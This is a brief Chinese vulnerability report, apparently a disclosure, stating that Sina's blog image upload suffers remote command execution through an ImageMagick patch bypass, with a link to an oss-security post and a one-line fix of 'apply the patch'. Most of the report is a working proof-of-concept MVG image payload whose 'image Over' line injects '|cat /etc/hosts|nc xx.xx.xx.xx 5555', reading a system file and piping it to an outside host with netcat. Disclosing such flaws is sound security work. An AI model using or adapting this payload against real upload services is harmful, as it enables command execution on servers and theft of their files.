新浪存在远程命令执行漏洞(ImageMagick补丁绕过)
详情:
http://permalink.gmane.org/gmane.comp.security.oss.general/19669
poc.png
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|cat /etc/hosts|nc xx.xx.xx.xx 5555'
pop graphic-context
博客上传图片的地方上传一个图片
解决方案:
打补丁